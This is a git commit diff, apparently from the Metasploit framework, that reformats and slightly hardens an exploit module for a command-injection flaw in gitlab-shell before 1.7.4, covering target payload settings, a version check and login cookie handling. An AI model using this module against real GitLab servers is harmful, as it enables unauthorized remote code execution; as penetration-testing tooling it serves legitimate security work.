Do minor cleanup

jvazquez-r7 · jvazquez-r7 · commit 4e0f6dfcc7f8 · 2014-08-15T09:10:08.000-05:00
diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -16,12 +16,12 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Gitlab-shell Code Execution',
       'Description'    => %q(
-          This module takes advantage of the addition of authorized
-          ssh keys in the gitlab-shell functionality of Gitlab. Versions
-          of gitlab-shell prior to 1.7.4 used the ssh key provided directly
-          in a system call resulting in a command injection vulnerability. As
-          this relies on adding an ssh key to an account valid credentials
-          are required to exploit this vulnerability.
+        This module takes advantage of the addition of authorized
+        ssh keys in the gitlab-shell functionality of Gitlab. Versions
+        of gitlab-shell prior to 1.7.4 used the ssh key provided directly
+        in a system call resulting in a command injection vulnerability. As
+        this relies on adding an ssh key to an account valid credentials
+        are required to exploit this vulnerability.
       ),
       'Author'  =>
         [
@@ -36,31 +36,42 @@ def initialize(info = {})
       'Platform'  => 'linux',
       'Targets'        =>
         [
-          ['Linux', {
-            'Platform' => 'linux',
-            'Arch' => ARCH_X86
-          }],
-          ['Linux (x64)', {
-            'Platform' => 'linux',
-            'Arch' => ARCH_X86_64
-          }],
-          ['Unix (CMD)', {
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Payload' =>
+          [ 'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Linux (x64)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86_64
+            }
+          ],
+          [ 'Unix (CMD)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Payload' =>
                 {
-                  'Compat'      => {
-                    'RequiredCmd' => 'openssl perl python'
-                  },
+                  'Compat'      =>
+                    {
+                      'RequiredCmd' => 'openssl perl python'
+                    },
                   'BadChars' => "\x22"
                 }
-
-          }],
-          ['Python', {
-            'Platform' => 'python',
-            'Arch' => ARCH_PYTHON,
-            'Payload' => { 'BadChars' => "\x22" }
-          }]
+            }
+          ],
+          [ 'Python',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'Payload' =>
+                {
+                  'BadChars' => "\x22"
+                }
+            }
+          ]
         ],
       'CmdStagerFlavor' => %w( bourne printf ),
       'DisclosureDate' => 'Nov 4 2013',
@@ -93,10 +104,9 @@ def execute_command(cmd, _opts = {})
 
   def check
     res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
-    if res && res.body.include?('GitLab')
+    if res && res.body && res.body.include?('GitLab')
       return Exploit::CheckCode::Detected
     else
-      vprint_error("#{peer} - Connection timed out")
       return Exploit::CheckCode::Unknown
     end
   end
@@ -144,6 +154,8 @@ def login
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
 
     @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
+
+    fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
   end
 
   def add_key(cmd)
